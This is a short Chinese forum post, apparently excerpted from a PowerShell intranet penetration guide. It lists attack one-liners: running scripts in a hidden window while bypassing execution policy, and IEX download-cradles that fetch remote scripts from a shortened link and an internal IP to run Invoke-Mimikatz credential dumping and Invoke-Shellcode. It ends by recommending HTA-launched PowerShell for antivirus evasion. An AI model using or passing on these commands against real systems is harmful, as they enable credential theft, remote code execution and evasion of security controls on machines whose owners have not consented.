13719654321 发表于 2018-9-2 10:18:54

PowerShell-saluteiceman

  摘自:《powershell内网***_light》
  本地权限绕过
PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1  本地隐藏权限绕过执行脚本
PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File xxx.ps1  直接用IEX下载远程的PS1脚本回来权限绕过执行
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"  内网***实例
  远程代码执行:
IEX (New-Object Net.WebClient).DownloadString(“http:///path/xxx.ps1”)  目标主机‘安装’invoke-shellcode脚本
IEX (New-Object Net.WebClient).DownloadString("http://192.168.146.129/CodeExecution/Invoke--Shellcode.ps1")  查看帮助信息:
Get-Help Invoke-Shellcode  有一段时间了,忽然看见freebuf一篇文章很实用,通过hta来调用powershell(最大特点免杀),很受启发。(文章地址:http://www.freebuf.com/tools/90362.html)


页: [1]
查看完整版本: PowerShell-saluteiceman